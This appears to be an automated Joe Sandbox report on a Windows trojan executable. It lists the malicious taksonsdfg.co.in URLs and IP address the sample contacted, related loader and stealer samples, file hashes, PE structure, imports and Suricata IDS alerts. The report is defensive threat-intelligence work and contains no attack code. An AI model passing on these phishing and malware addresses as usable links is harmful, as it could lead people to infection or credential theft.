https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWb	6BE4RDldhw.exe, 00000000.00000003.2475345569.000000000090B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.pmail.com	6BE4RDldhw.exe, 6BE4RDldhw.exe, 00000000.00000002.2598433621.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CD3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$	6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in	6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#	6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://taksonsdfg.co.in/Yr	6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.veeble.org/contact/	6BE4RDldhw.exe, 00000000.00000002.2598024798.00000000206F3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2261026230.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961227445.0000000000928000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345256582.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2433861488.00000000206F3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1475992472.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176965259.000000000093E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1394988770.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1520540319.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914704829.000000000093A000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475288001.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827529061.00000000206D1000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521010683.0000000000931000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FAC6000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.170.55.202	taksonsdfg.co.in	United States		20454	SSASN2US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562862
Start date and time:	2024-11-26 08:11:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6BE4RDldhw.exe renamed because original name is a hash value
Original Sample Name:	04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 22 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:12:07	API Interceptor	29x Sleep call for process: 6BE4RDldhw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
108.170.55.202	https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8	Get hash	malicious	HTMLPhisher	Browse
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse
	241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse
	Julcbozqsvtzlo.cmd	Get hash	malicious	Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe	Browse
	Uduknnywyznljn.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	IN-34823_PO39276-pdf.vbe	Get hash	malicious	Remcos, DBatLoader	Browse
	Products_Specification.XLs.PIF.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	PAYMENT SWIFT.XLs.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Get hash	malicious	Remcos, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
taksonsdfg.co.in	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202
	241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202
	Julcbozqsvtzlo.cmd	Get hash	malicious	Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe	Browse	108.170.55.202

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SSASN2US	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	198.15.97.148
	https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8	Get hash	malicious	HTMLPhisher	Browse	108.170.55.202
	5.hta	Get hash	malicious	Unknown	Browse	131.153.13.235
	nabmips.elf	Get hash	malicious	Unknown	Browse	64.38.201.185
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	108.170.53.110
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	198.15.73.56
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	AGjaVihni8.elf	Get hash	malicious	Mirai, Gafgyt	Browse	66.85.144.18
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202
	241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	AnyDesk.exe	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	108.170.55.202
	file.exe	Get hash	malicious	LummaC Stealer	Browse	108.170.55.202
	file.exe	Get hash	malicious	LummaC Stealer	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.666050576830342
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	6BE4RDldhw.exe
File size:	1'483'264 bytes
MD5:	1a6538c76ae6ea94e5a6976adf7dbd67
SHA1:	f31c769d58680d42e5c34a8119bf855fc4920060
SHA256:	04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820
SHA512:	9b2122be0467ad85968353b2423277d32483daf7eedf2a6ca3660c220c0bbd0552ea223838e0de188ea87481c3a669b54703ca32c13987530bd69460b93ef7aa
SSDEEP:	24576:Gj2o2Y8F82BK8Uk1zVv2+8OioUMxW24Q7Q9Z:2pih6+8OiSWaOZ
TLSH:	A0658CF1DDD34073E16D2A38485B57943B3F7A212A24787722E7295CBEE2183E416C6B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static PE Info

General

Entrypoint:	0x4777b0
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e0c584ef26caf72c3edd541e067b9b27

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00476028h
call 00007F57E8BDCB31h
mov eax, dword ptr [004831D4h]
mov eax, dword ptr [eax]
call 00007F57E8C36AC1h
mov ecx, dword ptr [00482F5Ch]
mov eax, dword ptr [004831D4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00475850h]
call 00007F57E8C36AC1h
mov eax, dword ptr [004831D4h]
mov eax, dword ptr [eax]
call 00007F57E8C36B35h
call 00007F57E8BDA888h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a000	0x28de	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x97000	0xde200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8f000	0x7ed8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8e000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a7a8	0x654	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x75280	0x75400	7b99ecf2d40774d0dee5d319e4406c89	False	0.5062633262260128	data	6.533447895719042	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x77000	0x7f8	0x800	7939fb42346a3573bcce4beaa0aff3db	False	0.63037109375	data	6.197498060325328	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x78000	0xb37c	0xb400	9e775d362392e93a9c5f11021bcec23b	False	0.09756944444444444	data	6.0082253940594486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x84000	0x5080	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x8a000	0x28de	0x2a00	1a6b44b7edf62d7422a9f2343472ad2b	False	0.31212797619047616	data	5.124714462266893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x8d000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x8e000	0x18	0x200	f7330844b74feb8abc687f6e65c4714c	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8f000	0x7ed8	0x8000	399f34b3422492e1759fcfd458b423ca	False	0.614990234375	data	6.673102018475595	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x97000	0xde200	0xde200	40b7c388d388d5d084c1cdf3f71850f1	False	0.46841257210185705	data	5.750257466428882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x97ad8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x97c0c	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x97d40	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x97e74	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x97fa8	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x980dc	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x98210	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x98344	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x98514	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x986f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x988c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x98a98	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x98c68	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x98e38	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x99008	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x991d8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x993a8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x99578	0xd7a28	Device independent bitmap graphic, 800 x 368 x 24, image size 883200, resolution 3780 x 3780 px/m	English	United States	0.4712977220234591
RT_BITMAP	0x170fa0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x171088	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0			0.4800656660412758
RT_DIALOG	0x172130	0x52	data			0.7682926829268293
RT_DIALOG	0x172184	0x52	data			0.7560975609756098
RT_STRING	0x1721d8	0x33c	data			0.4384057971014493
RT_STRING	0x172514	0x1ac	data			0.572429906542056
RT_STRING	0x1726c0	0xcc	data			0.6764705882352942
RT_STRING	0x17278c	0x114	data			0.6086956521739131
RT_STRING	0x1728a0	0x350	data			0.43514150943396224
RT_STRING	0x172bf0	0x3ac	data			0.3797872340425532
RT_STRING	0x172f9c	0x370	data			0.4022727272727273
RT_STRING	0x17330c	0x3cc	data			0.33539094650205764
RT_STRING	0x1736d8	0x214	data			0.49624060150375937
RT_STRING	0x1738ec	0xcc	data			0.6274509803921569
RT_STRING	0x1739b8	0x194	data			0.5643564356435643
RT_STRING	0x173b4c	0x3c4	data			0.3288381742738589
RT_STRING	0x173f10	0x338	data			0.42961165048543687
RT_STRING	0x174248	0x294	data			0.42424242424242425
RT_RCDATA	0x1744dc	0x10	data			1.5
RT_RCDATA	0x1744ec	0x310	data			0.7040816326530612
RT_RCDATA	0x1747fc	0x95f	Delphi compiled form 'T__159519113'			0.4476865360566903
RT_GROUP_CURSOR	0x17515c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x175170	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x175184	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x175198	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1751ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1751c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1751d4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x1751e8	0x14	data			1.2

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll	GetOpenFileNameA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T08:12:11.473687+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49702	108.170.55.202	443	TCP
2024-11-26T08:12:13.402767+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49708	108.170.55.202	443	TCP
